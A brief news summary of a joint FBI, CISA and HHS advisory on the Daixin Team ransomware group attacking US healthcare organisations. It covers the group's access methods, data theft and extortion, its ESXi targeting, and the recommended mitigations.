The FBI, the CISA, and the HHS have issued a joint advisory about a new ransomware group that is actively targeting healthcare organizations in the U.S.
Highlights from the advisory
According to the advisory, a new cybercrime group called Daixin Team has been targeting multiple healthcare organizations since June.
- The attackers are deploying ransomware to encrypt data on servers used for a range of services including electronic health records, diagnostics, imaging, and intranet services.
- Before encrypting, the ransomware group exfiltrates Personal Identifiable Information (PII), and Patient Health Information (PHI). These data are then later used by the group to extort their victims.
- It is believed that the group’s ransomware is based on leaked Babuk Locker source code.
Attack vectors
Daixin Team, generally, leverages VPN servers to gain initial access to victims’ networks. However, it was observed using two attack vectors recently.
While it exploited an unpatched vulnerability in an organization’s VPN server, it used compromised credentials to access a legacy VPN server in another attack.
What more?
- Other than leveraging VPN servers, the group is also noted to have used other legitimate tools such as Remote Desktop Protocol (RDP), Rclone, Ngrok, and SSH for data exfiltration.
- The ransomware is capable of targeting ESXi servers and encrypts files located in /vmfs/volumes with different extensions such as .vmdk, .vmem, .vswp, .vmsd, .vmx, and .vmsn.
Summing up
The federal agencies have laid out steps for mitigating ransomware attacks by Daixin Team. This includes keeping operating systems, software, and firmware updated. Organizations must deploy MFA as much as possible, secure and monitor RDP, and implement network segmentation.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/d091_shutterstock_1492617809.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/1fdf_apt.jpg)
